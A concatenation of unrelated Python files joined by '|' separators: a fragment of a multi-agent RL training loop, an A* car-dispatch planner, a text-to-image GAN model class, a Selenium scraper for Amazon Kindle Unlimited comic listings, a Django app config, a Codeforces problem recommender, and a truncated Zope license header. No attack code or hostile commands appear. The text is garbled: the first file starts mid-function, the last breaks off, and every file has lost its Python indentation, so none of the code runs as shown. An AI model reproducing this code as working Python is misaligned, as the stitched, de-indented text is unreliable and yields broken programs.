process_max_MI_loss,_ = policy.train_mine(good_data_buffer, 1, batch_size=args.batch_size)
else:
process_max_MI_loss = 0.0
else :
process_min_MI_loss = 0.0
process_max_MI_loss = 0.0
process_Q,process_min_MI ,process_max_MI, Q_grads,MI_grads = policy.train_actor_with_mine(replay_buffer, 1, args.batch_size,args.discount, args.tau,max_mi_c=0.0,min_mi_c=0.0 ,min_adv_c=args.min_adv_c, max_adv_c=args.max_adv_c )
process_max_MI_list.append(process_max_MI)
process_Q_list.append(process_Q)
Q_grads_list.append(Q_grads)
MI_grads_list.append(MI_grads)
process_max_MI_loss_list.append(process_max_MI_loss)
process_min_MI_list.append(process_min_MI)
process_min_MI_loss_list.append(process_min_MI_loss)
if len(moving_avg_reward_list) % 10 == 0 :
writer.add_scalar("data/MINE_lower_bound_loss", np.mean(process_max_MI_loss_list), total_timesteps)
writer.add_scalar("data/process_Q", np.mean(process_Q_list), total_timesteps)
writer.add_scalar("data/club_upper_bound_loss", np.mean(process_min_MI_loss_list), total_timesteps)
obs = env.reset()
state = np.concatenate(obs, -1)
#print("ep reward ", episode_reward)
moving_avg_reward_list.append(episode_reward)
#obs = env.reset()
#writer.add_scalar("data/run_reward", episode_reward, total_timesteps)
done = False
explr_pct_remaining = max(0, 25000 - episode_num) / 25000
policy.scale_noise( 0.3 * explr_pct_remaining)
policy.reset_noise()
episode_reward = 0
reward_list = []
eposide_reward_list = []
episode_timesteps = 0
episode_num += 1
data_recorder = []
replay_buffer_recorder =[]
best_reward_start = -1
best_reward = -1000000
# FIXME 1020
Mi_list = []
# Select action randomly or according to policy
scaled_a_list = []
for i in range(n_agents):
a = policy.select_action(obs[i], i)
scaled_a = np.multiply(a, 1.0)
scaled_a_list.append(scaled_a)
if args.env_name == "simple_reference":
action_n = np.array([[0, a[0], 0, a[1],0, a[2],a[3]] for a in scaled_a_list])
# Perform action
elif args.env_name == "simple":
action_n = np.array([[a[0], a[1]] for a in scaled_a_list])
else :
action_n = np.array([[0, a[0], 0, a[1],0] for a in scaled_a_list])
#print(action_n)
next_obs, reward, done, _ = env.step(action_n)
reward = reward[0]
next_state = np.concatenate(next_obs, -1)
done = all(done)
terminal = (episode_timesteps + 1 >= 25)
done_bool = float(done or terminal)
episode_reward += reward
eposide_reward_list.append(reward)
# Store data in replay buffer
replay_buffer_recorder.append((obs, state,next_state,next_obs, np.concatenate(scaled_a_list,-1), reward, done))
data_recorder.append([obs, state, scaled_a_list])
obs = next_obs
state = next_state
episode_timesteps += 1
total_timesteps += 1
timesteps_since_eval += 1
print("total time ",time.time()-start_time)
policy.save(total_timesteps, "model/" + file_name)
writer.close()
|
from copy import deepcopy
from enum import Enum
import itertools
import numpy as np
import heapq, time
from scipy.spatial.distance import cdist
import pickle
from matplotlib import pyplot as plt
import imageio
class Status(Enum):
PREOPENED = 0
OPENED = 1
CLOSED = 2
CANCELED = 3
class Car:
def __init__(self, position, id):
"""
:param position: cartesian coordinate tuple
:param id: integeral id, uniqe with respect to other cars in simulation
"""
self.position = np.reshape(position, (2,))
self.id = id
self.commited = False
self.targetId = None
self.path = [self.position]
return
def __lt__(self, other):
if not isinstance(other, Car):
raise Exception("other must be of type Car.")
else:
return self.id<=other.id
def __eq__(self, other):
if not isinstance(other, Car):
raise Exception("other must be of type Car.")
elif self.id==other.id:
raise Exception("Duplicate car Ids used.")
else:
return False
def __hash__(self):
return hash((self.id, self.position[0], self.position[1]))
def createCopy(self):
" return a deep copy of the car"
return deepcopy(self)
def commit(self, targetId):
"""
commits a car to the target
:param targetId: event to commit car to
:return: None
"""
self.commited = True
self.targetId = targetId
return
def uncommit(self):
self.commited = False
self.targetId = None
def fullEq(self, other):
psEq = np.array_equal(self.position, other.position)
idEq = self.id == other.id
cmEq = self.commited == other.commited
trEq = self.targetId == other.targetId
return psEq and idEq and cmEq and trEq
class Event:
def __init__(self, position, id, start, end):
"""
:param position: xcartesian coordinate tuple
:param id: integral id, unique with respect to other events
:param start: integral start time
:param end: integral end time
"""
self.id = id
self.position = np.reshape(position, (2,))
self.commited = False
self.startTime = start
self.endTime = end
self.status = Status.PREOPENED
return
def __lt__(self, other):
if not isinstance(other, Event):
raise Exception("Other must be of type Event")
else:
return self.id<=other.id
def __eq__(self, other):
if not isinstance(other, Event):
raise Exception("other must be of type Event.")
elif self.id==other.id:
raise Exception("Duplicate event Ids used.")
else:
return False
def __hash__(self):
return hash(self.id)
def commit(self, timeDelta):
self.commited = True
self.endTime += timeDelta
return
def createCopy(self):
return deepcopy(self)
def updateStatus(self):
prev = self.status
if self.status == Status.CLOSED or self.status == Status.CANCELED:
pass
elif self.startTime<=0 and self.endTime>=0:
self.status = Status.OPENED
elif self.endTime<0:
self.status = Status.CANCELED
else:
pass
if self.status != prev:
return self.status
else:
return None
def fullEq(self, other):
idEq = self.id == other.id
psEq = np.array_equal(self.position, other.position)
cmEq = self.commited == other.commited
stEq = self.startTime == other.startTime
etEq = self.endTime == other.endTime
sttEq = self.status == other.status
return idEq and psEq and cmEq and stEq and etEq and sttEq
class commitMonitor:
def __init__(self,commitedDict,notCommitedDict):
self.commited = commitedDict
self.notCommited = notCommitedDict
def commitObject(self, id):
if id in self.commited.keys():
raise Exception("error, object is already in commited Dict!")
else:
objectToCommit = self.notCommited.pop(id)
self.commited[id] = objectToCommit
def unCommitObject(self, id):
if id in self.notCommited.keys():
raise Exception("error, object is already in not commited Dict!")
else:
objectToUnCommit = self.commited.pop(id)
self.notCommited[id] = objectToUnCommit
def getObject(self, id):
if id in self.commited:
return self.commited[id]
elif id in self.notCommited:
return self.notCommited[id]
else:
raise Exception("no object with given id.")
def getCommitedKeys(self):
return self.commited.keys()
def getUnCommitedKeys(self):
return self.notCommited.keys()
def length(self):
return len(self.commited)+len(self.notCommited)
class SearchState:
def __init__(self,root , carMonitor, eventMonitor, cost, parent, time, weight=1, cancelPenalty=50, closeReward=10, timeDelta=5, eps=0.001):
self.cars = carMonitor
self.events = eventMonitor
self.gval = cost
self.hval = float('Inf')
self.weight = weight
self.cancelPenalty = cancelPenalty
self.closeReward = closeReward
self.parent = parent
self.root = root
self.td = timeDelta
self.time = time
self.eps = eps
return
def __lt__(self, other):
if not isinstance(other, SearchState):
raise Exception("States must be compared to another State object.")
else:
return self.getFval()<=other.getFval()
def __eq__(self, other):
if not isinstance(other, SearchState):
raise Exception("States must be compared to another State object.")
else:
# check time equality
if self.time!=other.time:
return False
# check commited car equality
for k in self.cars.getCommitedKeys():
if self.cars.getObject(k).fullEq(other.cars.getObject(k)):
continue
else:
return False
# check not commited car equality
for k in self.cars.getUnCommitedKeys():
if self.cars.getObject(k).fullEq(other.cars.getObject(k)):
continue
else:
return False
# check commited events equality
for k in self.events.getCommitedKeys():
if self.events.getObject(k).fullEq(other.events.getObject(k)):
continue
else:
return False
# check not commited events equality
for k in self.events.getUnCommitedKeys():
if self.events.getObject(k).fullEq(other.events.getObject(k)):
continue
else:
return False
# all checks passed
return True
def __hash__(self):
cmHash = [hash(self.cars.getObject(k)) for k in self.cars.getCommitedKeys()]
ncmHash = [hash(self.cars.getObject(k)) for k in self.cars.getUnCommitedKeys()]
return hash(tuple(cmHash+ncmHash))
def getFval(self):
return self.gval+self.hval*self.weight
def path(self):
current = self
p = []
while current is not None:
if not current.root:
p.append(current)
current = current.parent
else:
p.append(current)
p.reverse()
return p
def goalCheck(self):
# check commited events
for k in self.events.getCommitedKeys():
opened = self.events.getObject(k).status == Status.OPENED
pre = self.events.getObject(k).status == Status.PREOPENED
if opened or pre:
return False
# check uncommited events
for k in self.events.getUnCommitedKeys():
opened = self.events.getObject(k).status == Status.OPENED
pre = self.events.getObject(k).status == Status.PREOPENED
if opened or pre:
return False
# all are either closed or canceled
return True
def commitCars(self, commit):
for carId,eventId in commit:
# update car
self.cars.getObject(carId).commit(eventId)
self.cars.commitObject(carId)
# update event
self.events.getObject(eventId).commit(self.td)
self.events.commitObject(eventId)
return
def moveCars(self, move):
# uncommited
for i,k in enumerate(self.cars.getUnCommitedKeys()):
tempCar = self.cars.getObject(k)
tempCar.path.append(tempCar.position)
tempCar.position += move[i, :]
# commited cars
for k in self.cars.getCommitedKeys():
tempCar = self.cars.getObject(k)
tempCar.path.append(tempCar.position)
targetPosition = self.events.getObject(tempCar.targetId).position
delta = tempCar.position-targetPosition
if delta[0]!=0:
tempCar.position[0] += np.sign(delta[0])
else:
tempCar.position[1] += np.sign(delta[1])
return
def updateStatus(self, matrix):
# update event status
counter = {Status.OPENED : 0, Status.CLOSED: 0, Status.CANCELED: 0}
for eventId in range(self.events.length()):
tempEvent = self.events.getObject(eventId)
tempEvent.startTime -= 1
tempEvent.endTime -= 1
newStatus = tempEvent.updateStatus()
if newStatus is not None:
counter[newStatus] += 1
# update commited cars and events
for carId in range(self.cars.length()):
tempCar = self.cars.getObject(carId)
if tempCar.commited:
if matrix[carId, tempCar.targetId]<=self.eps and self.events.getObject(tempCar.targetId).status==Status.OPENED:
self.events.getObject(tempCar.targetId).status = Status.CLOSED # update event status
self.events.unCommitObject(tempCar.targetId) # uncommit event
self.cars.unCommitObject(carId) # uncommit car
tempCar.uncommit() # update car field
counter[Status.CLOSED] += 1
else: # update uncommited events
closedEvents = np.where(matrix[carId, :]<=self.eps)
for e in closedEvents[0]:
tempEvent = self.events.getObject(e)
if tempEvent.status==Status.OPENED and not tempEvent.commited: # uncommited event reached
tempEvent.status = Status.CLOSED # close event
counter[Status.CLOSED] += 1 # incriment counter
return counter
def getDistanceMatrix(self):
# create distance matrix
carPositions = np.vstack([self.cars.getObject(i).position for i in range(self.cars.length())])
evePositions = np.vstack([self.events.getObject(i).position for i in range(self.events.length())])
matrix = cdist(carPositions, evePositions, metric="cityblock")
return matrix
def updateCost(self, counter, move):
cost = 0
cost += np.sum(move)
cost += len(self.cars.commited)
cost += counter[Status.OPENED]
cost += counter[Status.CANCELED]*self.cancelPenalty
cost -= counter[Status.CLOSED]*self.closeReward
self.gval += cost
return
def updateHeuristic(self, matrix):
# commited events
h1 = 0
for carId in self.cars.getCommitedKeys():
tempCar = self.cars.getObject(carId)
closeTime = self.events.getObject(tempCar.targetId).endTime
dist = matrix[carId, tempCar.targetId]
if dist<=closeTime:
h1 -= self.closeReward
else:
h1 += self.cancelPenalty
# uncommited events
h2 = 0
for eventId in self.events.getUnCommitedKeys():
tempEvent = self.events.getObject(eventId)
startTime = tempEvent.startTime
closeTime = tempEvent.endTime
minDist = np.min(matrix[:, eventId])
if minDist-closeTime>0:
h2 += self.cancelPenalty
else:
h2 += np.max([minDist-startTime, 0]) + minDist - self.closeReward
self.hval = h1 + h2
return
class Heap:
def __init__(self):
self.array = list()
def __len__(self):
return len(self.array)
def insert(self, obj):
heapq.heappush(self.array, obj)
return
def extractMin(self):
return heapq.heappop(self.array) # get minimum from heap
def empty(self):
return len(self.array)==0
def heapify(self):
heapq.heapify(self.array)
return
def moveGenerator(numCars):
moveIter = itertools.product([(0,0), (0,1), (0,-1), (-1,0), (1,0)], repeat=numCars)
for move in moveIter:
yield np.array(move).astype(np.int8)
def commitGenerator(carIdList, eventIdList):
if len(eventIdList):
numOptionalCommits = np.min([len(carIdList)+1, len(eventIdList)+1])
for i in range(numOptionalCommits):
for carChoice in itertools.combinations(carIdList, i):
for eventChoice in itertools.combinations(eventIdList, i):
for eventChoicePermutations in itertools.permutations(eventChoice, len(eventChoice)):
yield list(zip(carChoice, eventChoicePermutations))
def descendentGenerator(state):
commitGen = commitGenerator(list(state.cars.getUnCommitedKeys()), list(state.events.getUnCommitedKeys()))
for commit in commitGen:
# commit cars
newCommitState = deepcopy(state)
# update root,parent and time for all descendants
newCommitState.root = False
newCommitState.parent = state
newCommitState.time += 1
newCommitState.commitCars(commit)
numUnCommitedCars = len(newCommitState.cars.notCommited)
moveGen = moveGenerator(numUnCommitedCars)
for possibleMove in moveGen:
# create copy for new descendent
newMoveState = deepcopy(newCommitState)
# move the cars according to possible move
newMoveState.moveCars(possibleMove)
# calc distance matrix between cars and events
dm = newMoveState.getDistanceMatrix()
# update status of events relative to new car positions
counter = newMoveState.updateStatus(dm)
# update cost: sum of new cost and previous state cost
newMoveState.updateCost(counter, possibleMove)
# update heuristic: heuristic of new state
newMoveState.updateHeuristic(dm)
# yield the new state
yield newMoveState
def aStar(initState, shouldPrint=False):
# start timers
t0 = time.clock()
calcTime = 0
objectCreationTime = 0
# create heap
openHeap = Heap()
closed = {}
# insert initial state
openHeap.insert(initState)
cnt = 0
while not openHeap.empty():
current = openHeap.extractMin()
if (current not in closed) or (current in closed and closed[current]>current.gval):
# remove previous equivalent state, and enter the new one
closed[current] = current.gval
# check if current state is a goal state, return path if it is
if current.goalCheck():
if shouldPrint:
print("solution found. Total Time: {0}, Total States explored: {1}".format(round(time.clock()-t0, 4), len(closed) + len(openHeap)))
print("rep count: {0}, calc time: {1}, object creation time: {2}".format(cnt, calcTime, objectCreationTime))
return current.path()
# calculate all possible following states
for descendent in descendentGenerator(current):
# check if is in closed
if (descendent in closed) and (descendent.gval<closed[descendent]):
closed.pop(descendent) # remove from closed
openHeap.insert(descendent) # add to open
else:
openHeap.insert(descendent) # fresh state, insert into the existing heap
if shouldPrint:
print("solution not found. Total Time: {0}, Total States explored: {1}".format(round(time.clock()-t0,4), len(closed) + len(openHeap)))
print("rep count: {0}, calc time: {1}, object creation time: {2}".format(cnt, calcTime, objectCreationTime))
return None # no solution exists
def main():
np.random.seed(10)
deltaTimeForCommit = 5
closeReward = 10
cancelPenalty = 50
gridSize = 4
deltaOpenTime = 5
numCars = 1
numEvents = 4
maxTime = 20
carPos = np.reshape(np.random.randint(0, gridSize, 2 * numCars), (2,numCars))
eventPos = np.reshape(np.random.randint(0, gridSize, 2 * numEvents), ( 2,numEvents))
eventStartTime = np.random.randint(0, maxTime, numEvents)
eventEndTime = deltaOpenTime + eventStartTime
# carPos = np.array([0,0]).reshape(2,numCars)
# eventPos = np.array([[5,5],[5,10]])
# eventStartTime = np.array([5,10])
# eventEndTime = eventStartTime + deltaOpenTime
uncommitedCarDict = {}
commitedCarDict = {}
uncommitedEventDict = {}
commitedEventDict = {}
for i in range(numCars):
tempCar = Car(carPos[:,i],i)
uncommitedCarDict[i] = tempCar
for i in range(numEvents):
tempEvent = Event(eventPos[:,i],i,eventStartTime[i],eventEndTime[i])
uncommitedEventDict[i] = tempEvent
carMonitor = commitMonitor(commitedCarDict,uncommitedCarDict)
eventMonitor = commitMonitor(commitedEventDict,uncommitedEventDict)
initState = SearchState(root = True,carMonitor= carMonitor,eventMonitor = eventMonitor,cost = 0,parent = None,time = 0,weight =1,cancelPenalty=cancelPenalty,closeReward=closeReward,timeDelta=deltaTimeForCommit,eps = 0.001)
stime = time.clock()
p = aStar(initState)
etime = time.clock()
runTime = etime - stime
print('cost is:' + str(p[-1].gval))
print('run time is: '+str(runTime))
actualMaxTime = len(p)
numUnCommited = np.zeros(actualMaxTime)
numCommited = np.zeros(actualMaxTime)
timeVector = list(range(actualMaxTime))
closedEvents = np.zeros(actualMaxTime)
openedEvents = np.zeros(actualMaxTime)
canceledEvents= np.zeros(actualMaxTime)
allEvents = np.zeros(actualMaxTime)
for i,st in enumerate(p):
numUnCommited[i] = len(list(st.events.getUnCommitedKeys()))
numCommited[i] = len(list(st.events.getCommitedKeys()))
for iE in range(numEvents):
eventTemp = st.events.getObject(iE)
if eventTemp.status == Status.CANCELED:
canceledEvents[i] += 1
elif eventTemp.status == Status.CLOSED:
closedEvents[i] += 1
elif eventTemp.status == Status.OPENED:
openedEvents[i] += 1
allEvents[i] = canceledEvents[i]+closedEvents[i]+openedEvents[i]
# dump logs
with open( 'MyAStarResult_' + str(1) + 'weight_' + str(numCars) + 'numCars_' + str(numEvents) + 'numEvents_' + str(gridSize) + 'gridSize.p', 'wb') as out:
pickle.dump({'runTime': runTime,
'time': timeVector,
'OpenedEvents' : openedEvents,
'closedEvents' : closedEvents,
'canceledEvents': canceledEvents,
'allEvents' : allEvents, 'cost': p[-1].gval}, out)
imageList = []
for s in p:
imageList.append(plotForGif(s, numEvents,numCars, gridSize))
imageio.mimsave('./gif_AStarSolution_' + str(gridSize) + 'grid_' + str(numCars) + 'cars_' + str(numEvents) + 'events_' + str(deltaOpenTime) + 'eventsTw_' + str(maxTime) + 'maxTime.gif', imageList, fps=1)
def plotForGif(s, ne,nc, gs):
"""
plot cars as red points, events as blue points,
and lines connecting cars to their targets
:param carDict:
:param eventDict:
:return: image for gif
"""
fig, ax = plt.subplots()
ax.set_title('time: {0}'.format(s.time))
for c in range(nc):
carTemp = s.cars.getObject(c)
ax.scatter(carTemp.position[0], carTemp.position[1], c='k', alpha=0.5)
ax.scatter([], [], c='b', marker='*', label='Opened not commited')
ax.scatter([], [], c='b', label='Opened commited')
ax.scatter([], [], c='r', label='Canceled')
ax.scatter([], [], c='g', label='Closed')
for i in range(ne):
eventTemp = s.events.getObject(i)
if eventTemp.status == Status.OPENED and eventTemp.commited:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='b', alpha=0.7)
elif eventTemp.status == Status.OPENED and eventTemp.commited == False:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='b', marker='*', alpha=0.7)
elif (eventTemp.status == Status.CLOSED):
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='g', alpha=0.2)
elif (eventTemp.status == Status.CANCELED):
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='r', alpha=0.2)
else:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='y', alpha=0.2)
ax.set_xlim([-1, gs + 1])
ax.set_ylim([-1, gs + 1])
ax.grid(True)
plt.legend()
# Used to return the plot as an image rray
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
return image
if __name__ == '__main__':
main()
print('Done.')
|
import torch
import torch.nn as nn
from DAMSM import ImageEncoder, TextEncoder, BertEncoder
from modules.models import (
Discriminator64,
Discriminator128,
Discriminator256,
Generator
)
from utils import init_weight, freeze_model
class Text2ImgModel(nn.Module):
def __init__(
self,
embedding_dim,
n_tokens,
text_encoder_embd_size,
pretrained_text_encoder_path,
pretrained_image_encoder_path,
pretrained_generator_path,
branch_num,
num_generator_filters,
num_discriminator_filters,
z_dim,
condition_dim,
is_bert_encoder,
use_sagan,
base_size,
device
):
super(Text2ImgModel, self).__init__()
self.z_dim = z_dim
self.is_bert_encoder = is_bert_encoder
self.image_encoder = ImageEncoder(
multimodal_feat_size=embedding_dim
).to(device)
if pretrained_image_encoder_path != '':
state_dict = torch.load(
pretrained_image_encoder_path,
map_location=lambda storage, loc: storage
)
self.image_encoder.load_state_dict(state_dict)
print('Load image encoder from:', pretrained_image_encoder_path)
else:
print('Warning: no pretrained image encoder')
for p in self.image_encoder.parameters():
p.requires_grad = False
self.image_encoder.eval()
if self.is_bert_encoder:
self.text_encoder = BertEncoder(emb_size=embedding_dim).to(device)
else:
self.text_encoder = TextEncoder(
n_tokens=n_tokens, text_feat_size=embedding_dim,
emb_size=text_encoder_embd_size
).to(device)
if pretrained_text_encoder_path != '':
state_dict = \
torch.load(pretrained_text_encoder_path,
map_location=lambda storage, loc: storage)
self.text_encoder.load_state_dict(state_dict)
print('Load text encoder from:', pretrained_text_encoder_path)
else:
print('Warning: no pretrained text encoder')
for p in self.text_encoder.parameters():
p.requires_grad = False
self.text_encoder.eval()
self.generator = Generator(
ngf=num_generator_filters,
emb_dim=embedding_dim,
ncf=condition_dim,
branch_num=branch_num,
device=device,
z_dim=z_dim,
is_sagan=use_sagan,
base_size=base_size,
).to(device)
self.discriminators = []
if branch_num > 0:
self.discriminators.append(Discriminator64(
dim=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
if branch_num > 1:
self.discriminators.append(Discriminator128(
ndf=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
if branch_num > 2:
self.discriminators.append(Discriminator256(
ndf=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
self.generator.apply(init_weight)
for i in range(len(self.discriminators)):
self.discriminators[i].apply(init_weight)
if pretrained_generator_path != '':
state_dict = torch.load(
pretrained_generator_path,
map_location=lambda storage, loc: storage
)
self.generator.load_state_dict(state_dict)
print('Load generator from: ', pretrained_generator_path)
def forward(self, captions, cap_lens, noise, masks):
if not self.is_bert_encoder:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens)
else:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens, masks)
mask = (captions == 0)
num_words = words_embeddings.size(2)
if mask.size(1) > num_words:
mask = mask[:, :num_words]
fake_images, attention_maps, mu, logvar = self.generator(
noise,
sentence_embedding,
words_embeddings,
mask
)
return fake_images, mu, logvar, sentence_embedding, words_embeddings
def save_model_ckpt(self, epoch, path):
torch.save({
'epoch': epoch,
'img_enc': self.image_encoder.state_dict(),
'txt_enc': self.text_encoder.state_dict(),
'discriminator': [d.state_dict() for d in self.discriminators],
'generator': self.generator.state_dict()
}, path)
def load_model_ckpt(self, path):
# Load
weights = torch.load(path)
self.image_encoder.load_state_dict(weights['img_enc'])
self.text_encoder.load_state_dict(weights['txt_enc'])
# Freeze parameters
freeze_model(self.image_encoder)
freeze_model(self.text_encoder)
self.image_encoder.eval()
self.text_encoder.eval()
for i, d in enumerate(self.discriminators):
d.load_state_dict(weights['discriminator'][i])
self.generator.load_state_dict(weights['generator'])
return weights['epoch']
class Text2ImgEvalModel(nn.Module):
def __init__(
self,
embedding_dim,
n_tokens,
text_encoder_embd_size,
branch_num,
num_generator_filters,
z_dim,
condition_dim,
is_bert_encoder,
use_sagan,
base_size,
device,
pretrained_ckpt=None,
pretrained_text_encoder_path=None,
pretrained_generator_path=None
):
super(Text2ImgEvalModel, self).__init__()
self.z_dim = z_dim
self.is_bert_encoder = is_bert_encoder
if self.is_bert_encoder:
self.text_encoder = BertEncoder(emb_size=embedding_dim).to(device)
else:
self.text_encoder = TextEncoder(
n_tokens=n_tokens, text_feat_size=embedding_dim,
emb_size=text_encoder_embd_size
).to(device)
self.generator = Generator(
ngf=num_generator_filters,
emb_dim=embedding_dim,
ncf=condition_dim,
branch_num=branch_num,
device=device,
z_dim=z_dim,
is_sagan=use_sagan,
base_size=base_size,
).to(device)
self.load_model(
pretrained_ckpt,
pretrained_text_encoder_path,
pretrained_generator_path
)
def forward(self, captions, cap_lens, noise, masks):
if not self.is_bert_encoder:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens)
else:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens, masks)
mask = (captions == 0)
num_words = words_embeddings.size(2)
if mask.size(1) > num_words:
mask = mask[:, :num_words]
fake_images, attention_maps, mu, logvar = self.generator(
noise,
sentence_embedding,
words_embeddings,
mask
)
return fake_images, mu, logvar, sentence_embedding, words_embeddings
def load_model(self, ckpt, text_enc, gen):
if ckpt is None and text_enc is None and gen is None:
raise FileNotFoundError("Set path to load the model")
if ckpt is not None and (text_enc is not None or gen is not None):
raise ValueError(
"Specify just one way for loading:"
"checkpoint path or two separate files"
"for text encoder and generator"
)
if ckpt is not None:
print('Loading from checkpoint')
weights = torch.load(ckpt)
self.text_encoder.load_state_dict(weights['txt_enc'])
self.generator.load_state_dict(weights['generator'])
elif gen is not None and text_enc is not None:
print('Loading from separate files')
self.text_encoder.load_state_dict(torch.load(text_enc))
self.generator.load_state_dict(torch.load(gen))
elif gen is None or text_enc is None:
raise FileNotFoundError(
"Specify both generator and text encoder files"
)
self.eval()
freeze_model(self)
if __name__ == '__main__':
DEV = torch.device('cpu')
model = Text2ImgModel(
embedding_dim=256,
n_tokens=20,
text_encoder_embd_size=128,
pretrained_text_encoder_path='',
pretrained_image_encoder_path='',
pretrained_generator_path='',
branch_num=3,
num_generator_filters=32,
num_discriminator_filters=64,
z_dim=100,
condition_dim=128,
is_bert_encoder=False,
base_size=32,
device=DEV,
use_sagan=True
)
print(model)
|
"""
事前に、create_db.pyを実行してDBファイルを作成しておく必要がある。
Amazon Kindle Unlimitedのコミックス検索ページについて
各ページをスクレイピングしてSqlite3のデータに保存する。
"""
import os
import sqlite3
import sys
import traceback
from contextlib import closing
from time import sleep
from retry import retry
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import TimeoutException
from selenium.webdriver import Chrome, ChromeOptions
db_name = 'database.db'
if not (os.path.exists(db_name)):
sys.exit('create_db.pyを先に実行してね')
# 一時的に環境変数を設定
delimiter = ';' if os.name == 'nt' else ':'
os.environ['PATH'] += (delimiter + os.path.abspath('driver'))
options = ChromeOptions()
options.add_argument('--headless')
driver = Chrome(options=options)
driver.set_window_size(10240, 10240)
page_counter = 0
@retry(TimeoutException, tries=4, delay=5, backoff=2)
def get_next_page(driver, next_page_link):
driver.get(next_page_link.get_attribute('href'))
try:
# コミックトップにアクセス
driver.get('https://www.amazon.co.jp/s/?rh=n%3A3201084051&ref_=msw_list_shoveler_KU_mangatop_title')
with closing(sqlite3.connect(db_name)) as conn:
c = conn.cursor()
c.execute('delete from comics')
insert_sql = '''insert into comics (
thumbnail,
book_name,
book_url,
release_date,
author_name) values (?, ?, ?, ?, ?)'''
while True:
page_counter += 1
print(str(page_counter) + 'ページ目の処理を開始しました。')
books = driver.find_elements_by_xpath(
'//*[@id="search"]//div[@class="s-include-content-margin s-border-bottom"]')
comics = []
# ページ内処理
for book in books:
# サムネイル取得
thumbnail = book.find_element_by_xpath('.//a/div/img[@class="s-image"]').get_attribute('src')
# 本の詳細情報取得
title_box = book.find_element_by_xpath('.//h2/a')
book_name = title_box.text.strip()
book_url = title_box.get_attribute('href')
release_date = ''
try:
release_date = book.find_element_by_xpath(
'.//span[@class="a-size-base a-color-secondary a-text-normal"]').text
except NoSuchElementException:
pass
author_name = ''
try:
author_name = \
book.find_element_by_xpath('.//div[@class="a-row a-size-base a-color-secondary"]').text.split(
'|')[
0]
except NoSuchElementException:
pass
# SQLのパラメータを作成
comics.append((thumbnail, book_name, book_url, release_date, author_name))
# ページごとにまとめて登録
c.executemany(insert_sql, comics)
conn.commit()
try:
next_page_link = driver.find_element_by_xpath(
'//*[@id="search"]//ul[@class="a-pagination"]//li[@class="a-last"]/a')
sleep(2)
get_next_page(driver, next_page_link)
if (page_counter % 100) == 0:
print('ちょっと休憩')
sleep(30)
except NoSuchElementException:
print(str(page_counter) + 'ページ目が最後のページの様です。処理を終了します。')
break
except:
traceback.print_exc()
finally:
driver.quit()
|
#
# inventory/regions/apps.py
#
"""
Regions App data
"""
__docformat__ = "restructuredtext en"
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class RegionsConfig(AppConfig):
name = 'inventory.regions'
label = 'regions'
verbose_name = _("Regions")
|
import urllib
from urllib.request import urlopen as Ureq, Request
import json
import time
import random
hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}
def get_json(url):
req = Request(url, headers=hdr)
page = Ureq(req)
try:
js = page.read().decode()
js = json.loads(js)
except:
js = None
return js
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
user_solve = set()
def get_user_solve(username):
url = "https://codeforces.com/api/user.status?handle=" + username
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return
for submission in js["result"]:
if submission["verdict"] == "OK":
user_solve.add(str(submission["problem"]["contestId"])+submission["problem"]["index"])
contest_list = set()
def get_contest_list():
url = "https://codeforces.com/api/contest.list"
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return
for contest in js["result"]:
name = contest["name"]
if "Div" in name:
contest_list.add(contest["id"])
def get_user_rating(username):
url = "https://codeforces.com/api/user.info?handles=" + username
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return 600
js = js["result"][0]
try:
return js["rating"];
except:
return 600
def not_taken(ls, tags):
mx = 0
for i in ls:
cnt = 0;
for j in i[2]:
if j in tags:
cnt += 1
try:
per = (cnt / len(i[2])) * 100;
except:
return False
mx = max(mx, per)
if mx > 80 and len(tags) == 0:
return False
return True
def recommender(username):
username = username.split()
user_rating = get_user_rating(username[0])
if user_rating is None:
return []
user_rating = int(user_rating / 100)
user_rating = int(user_rating * 100)
for user in username:
get_user_solve(user)
get_contest_list()
url = "https://codeforces.com/api/problemset.problems"
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return []
ret = list()
prob_a = 0
prob_b = 0
prob_c = 0
js = js["result"]["problems"]
random.shuffle(js)
for problem in js:
link = "https://codeforces.com/contest/" + str(problem["contestId"]) + "/problem/" + problem["index"]
name = problem["name"]
try:
rating = problem["rating"]
except:
continue
tags = problem["tags"]
contest_id = problem["contestId"]
prob_id = str(problem["contestId"]) + problem["index"]
if prob_id not in user_solve and contest_id in contest_list:
if rating == user_rating+100 and prob_a < 2:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_a += 1
elif rating == user_rating+200 and prob_b < 2:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_b += 1
elif rating == user_rating+300 and prob_c < 6:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_c += 1
if len(ret) >= 10:
return ret;
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
|
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
